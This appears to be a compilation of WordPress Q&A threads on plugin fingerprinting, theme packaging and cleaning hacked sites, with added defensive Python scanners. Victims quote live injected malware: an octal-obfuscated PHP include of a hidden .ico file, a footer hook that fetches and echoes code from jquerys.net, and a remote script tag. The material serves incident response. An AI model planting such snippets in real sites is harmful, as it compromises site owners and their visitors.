I wonder how websites like https://wpsec.com can find my WordPress themes and plugins.
When I tried to access the directory mydomain.com/wp-content/themes/my-theme, I got a 404, but how do they get this?
Are my firewalls and security malware plugins useless?
After thinking about this my conjecture on how this works is this:
Almost all plugins/themes have .css and/or .js files. For plugins these are stored in the plugin's installation directory - .../wp-content/plugins/some-plugin-directory. The URLs of the HTTP requests for these would look like this - httpx://some.host.com/wp-content/plugins/some-plugin-directory/js/some-javascript-file.js. From these requests wpsec can extract 'some-plugin-directory', which is what WordPress uses to identify a plugin. If the plugin is in the WordPress repository then wpsec can download the entire plugin and provide more information. If the plugin is proprietary then wpsec probably only has access to the publicly accessible .js and .css files. On my installation I have a proprietary plugin and wpsec found the installation directory - 'some-plugin-directory' - but did not report the version, probably because it cannot access the readme.txt or any of the .php files. So, if this conjecture is correct, if a plugin only has PHP, i.e. no .css, no .js and also no images stored in its installation directory, then wpsec should not be able to detect it. Of course the same reasoning applies to themes.
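To see what your own front page discloses in the way this answer conjectures, the following added example (not code from the poster or from wpsec) pulls plugin and theme directory names out of asset URLs in a page's HTML. It goes one step beyond the answer by also collecting the `?ver=` query string WordPress appends to enqueued assets; the function names, the `contact-form` slug and the sample HTML are constructed for illustration.

```python
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Matches /wp-content/plugins/<slug>/... and /wp-content/themes/<slug>/...
ASSET_RE = re.compile(r"/wp-content/(plugins|themes)/([^/]+)/")

class AssetCollector(HTMLParser):
    """Collect every src/href attribute value found in the page."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value:
                self.urls.append(value)

def exposed_components(html):
    """Map (kind, slug) -> set of ?ver= values seen in that component's asset URLs."""
    collector = AssetCollector()
    collector.feed(html)
    found = defaultdict(set)
    for url in collector.urls:
        parts = urlsplit(url)
        match = ASSET_RE.search(parts.path)
        if match:
            kind, slug = match.groups()
            # ver= may be the component's own version or the core version
            found[(kind, slug)].update(parse_qs(parts.query).get("ver", []))
    return dict(found)

# Constructed sample of a rendered front page (not taken from a real site).
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="https://some.host.com/wp-content/themes/my-theme/style.css?ver=2.1">
<script src="https://some.host.com/wp-content/plugins/some-plugin-directory/js/some-javascript-file.js"></script>
<script src="/wp-content/plugins/contact-form/js/form.js?ver=5.4.2"></script>
<script src="/wp-includes/js/jquery/jquery.min.js?ver=3.6.0"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for (kind, slug), versions in sorted(exposed_components(SAMPLE_HTML).items()):
        print(kind, slug, sorted(versions) or "version not disclosed")
```

A 404 on the directory itself changes nothing here, because the slugs come from URLs the page must serve for its own styles and scripts.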
I have created a theme on WordPress locally with XAMPP and wordpress.org, but now I don't know which files I should .zip so others can use my theme. I tried with those files below to test if the theme works, but it's not working when I upload it as a theme in WordPress:
Which files should I include in the .zip archive so the theme will be installable and have everything in it, such as pages, posts, etc.?
You only need the /wp-content/themes/YOUR-THEME folder. Everything else should already be there on other people's WordPress installations, as they are core files. Also never ever ever ever ever include your wp-config.php file with anybody. That contains sensitive database credentials that, if compromised, can give anybody access to everything on your site.
It looks like my WordPress site has been hacked. The following code snippet was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated WordPress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah, someone is including a .ico file (open it with a text editor, and you will see it is some PHP code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
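The path given in the answer above can be recovered mechanically, because PHP resolves `\NNN` octal escapes inside double-quoted strings. The following added example (not code from any poster) decodes the literal quoted in the question and flags includes that are escape-obfuscated or point at a non-PHP file; the function names and the extension list are assumptions, and the last two sample lines are constructed.

```python
import re

# PHP resolves \NNN (octal) and \xHH (hex) escapes inside double-quoted strings.
ESCAPE_RE = re.compile(r"\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})")
# include/require of a quoted literal, optionally @-silenced or parenthesised.
INCLUDE_RE = re.compile(
    r"""@?\b(?:include|require)(?:_once)?\s*\(?\s*(["'])(.*?)\1""")
CODE_EXTENSIONS = (".php", ".inc", ".phtml")  # assumption: what this site treats as code

def decode_php_escapes(literal):
    """Resolve octal and hex escapes as PHP would in a double-quoted string."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP keeps only the low byte
        return chr(int(m.group(2), 16))
    return ESCAPE_RE.sub(repl, literal)

def suspicious_includes(php_source):
    """Return (line, decoded_target, obfuscated, non_php_target) per flagged include."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in INCLUDE_RE.finditer(line):
            quote, raw = m.group(1), m.group(2)
            # Single-quoted PHP strings do not interpret these escapes.
            target = decode_php_escapes(raw) if quote == '"' else raw
            obfuscated = target != raw
            non_php = not target.lower().endswith(CODE_EXTENSIONS)
            if obfuscated or non_php:
                findings.append((lineno, target, obfuscated, non_php))
    return findings

# Lines 1-4 are the snippet quoted in the question; lines 5-6 are constructed
# examples of ordinary includes that must not be flagged.
SAMPLE = r'''<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
require_once ABSPATH . 'wp-settings.php';
include 'inc/helpers.php';
'''

if __name__ == "__main__":
    for finding in suspicious_includes(SAMPLE):
        print(finding)
```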
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB
Examine the saved uploads folder for files that shouldn't be there, like PHP files. Then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install the Wordfence security plugin and run the scan; then you will detect all the files with the injected code and you can clean the injected code manually.
You can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
On a WordPress site, I would like to make some files available for downloading, and some of these, I've just found out, cannot be added to the media library. Namely, it's not letting me upload a zipped folder, a Sketchup (.skp) file, and an HTML file.
If I want to make files available through a WordPress site that WordPress does not support, what are my options? Would it be possible to have a file stored elsewhere and still be downloadable through a link on the WordPress site? I'm new to WordPress, but (correct me if I'm wrong) WordPress.com, where the site in question is hosted, does not seem to allow plugins.
WordPress.com is essentially a blogging platform, unlike wordpress.org, where you can download the WordPress package and install it on a server. Most blogging service providers won't allow you to upload files to their servers due to security issues like shells and software piracy.
It is better to host your files somewhere else and link to them publicly from your blog. Another solution is to buy a hosting account and install the WordPress software, where you can upload and store the files you need without any restriction (according to the provider's usage policies).
I have just finished uploading the content of my WordPress site to Google Cloud. But I am now facing a huge limitation due to no I/O ability. I am posting this to see if anybody has devised a workaround.
I need to install Headway Themes and upload a package of buttons (Max Buttons Pro). I also have trouble installing the s2member Pro edition.
Any workarounds for this?
Themes & plugins have to be downloaded and extracted into your WordPress project folder and re-uploaded to App Engine.
Typical workflow:
Download desired theme (Usually as a .zip file)
Extract the .zip file into wordpress/wp-content/themes (you will see default themes here... there's also a folder for plugins)
Upload your project to App Engine (don't worry, this will not overwrite your data)
You will then see the themes or plugins show up on your WordPress dashboard.
This script keeps coming back to my wp-load.php file in the public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
This directs to a virus site, "jquerys.net".
What can be the solution? Deleting the function from wp-load.php does not eliminate it, as it regenerates on refreshing any page of my blog.
Kindly help
There could be malicious code injected into any of your WordPress files. You will need to go through all files, especially inside your theme, to look for code or files/folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in the wp-uploads folder; check there also for any file type different than images or documents.
Also important: check your current theme's functions.php file for malicious code. Often hacked themes (i.e. downloaded via BitTorrent websites or mafiashare websites) inject such code. Search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
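The cleanup steps earlier on this page ask you to examine the saved uploads folder for files that should not be there, and the answer above says to check it for anything that is not an image or document. The following added example (not code from any poster) walks such a folder and reports hidden files, unexpected file types and files that contain a PHP open tag whatever their extension; the allow-list, function names and sample tree are assumptions, and the sample file contents are constructed placeholders.

```python
import os
import tempfile

# Assumption: the only file types this site legitimately keeps in uploads.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".pdf", ".doc", ".docx"}

def audit_uploads(root):
    """Return sorted (relative_path, reasons) for files that need a manual look."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            reasons = []
            if name.startswith("."):
                reasons.append("hidden file")
            if os.path.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
                reasons.append("unexpected type")
            with open(path, "rb") as fh:
                # The extension proves nothing: look for a PHP open tag in the bytes.
                if b"<?php" in fh.read():
                    reasons.append("contains PHP")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)

def demo():
    """Build a constructed uploads tree in a temp directory and audit it."""
    sample = {  # constructed placeholder contents, not real malware
        "2020/01/photo.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
        "2020/01/.fb43d680.ico": b"<?php /* placeholder */ ?>",
        "2020/02/main.php": b"<?php /* placeholder */ ?>",
        "2020/02/logo.png": b"\x89PNG\r\n\x1a\n<?php /* placeholder */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return audit_uploads(root)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", ", ".join(reasons))
```

Run `audit_uploads()` against the downloaded copy of the uploads folder before anything is copied into the fresh install.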
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
I was able to detect the malicious script. It was in the public_html folder. The file was "main.php", which is not in the default installation and also does not contribute to any theme or plugin. After deleting all the unverified plugins, I deleted this file and deleted the code in wp-load.php.
At first, when I did not delete the "main.php" file, the 'function' in wp-load kept coming back. But after deleting the "main.php" file, I have rid myself of this virus.
There is a new virus in WP
There's a download of an update.exe initiated by the line
<script src="//socialstatsplugin.com/jqury.js"></script>
I have done some reviews for this kind of virus.
Just go to your WP folder and check for any unwanted hidden files; when you browse through them, the files are unreadable.
As said, just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folders within any folder. It has worked till now. Hope it will help. One never knows the future.
Thanks